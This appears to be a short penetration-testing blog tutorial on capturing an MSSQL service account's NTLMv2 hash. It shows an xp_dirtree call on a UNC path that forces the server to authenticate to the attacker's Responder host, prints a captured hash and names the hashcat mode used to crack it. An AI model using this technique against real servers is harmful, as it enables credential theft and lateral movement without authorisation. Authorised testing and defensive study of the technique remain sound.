Stealing MSSQL Service Cred

Hi everyone

Today, I am going to share interesting creds stealing on MSSQL services credentials. Maybe someday’s you get stuck during your penetration testing even though you have a compromised MSSQL server credential. Perhaps you are in a situation where you cannot find any interesting information in the database. In this tutorial, I would share another simple idea when you get stuck.

Another thing to do when you get stuck is to steal the MSSQL services account which maybe usefull to go ahead your lateral movement. The attack is to use the xp_dirtree functionality to browse file in your hacking machine that is running responder which will force the server to authenticate and give the authentication token


SQL> xp_dirtree 'C:\Users',0,1;

Xp_dirtree has three parameters: 

  1. directory – This is the directory you pass when you call the stored procedure;.
  2. depth  – This tells the stored procedure how many subfolder levels to display.  The default of 0 will display all subfolders.
  3. file – This will either display files as well as each folder.  The default of 0 will not display any files.

You can also use the xp_dirtree to browse UNC path for example

SQL> xp_dirtree '\\\rio'

With that capability you can run responder on your attacker machine to get the token

[SMB] NTLMv2-SSP Client   :
[SMB] NTLMv2-SSP Username : RIO-SERVER\mssql-svc
[SMB] NTLMv2-SSP Hash     : mssql-svc::RIO-SERVER:289968fad4d78dd3:E17B1EAFFEB1C5C10E592B9183112AE9:0101000000000000C0653150DE09D20161ED4A9AEC7A34ED000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D20106000400020000000800300030000000000000000000000000300000AB3E23C5E851A2FE97C9C868B5C33C0B6909534D1F15CD7272C67F3AAFA95D950A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E003300000000000000000000000000

With that hash then you can do hashcat cracking with the hash type 5600. Happy cracking ..

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s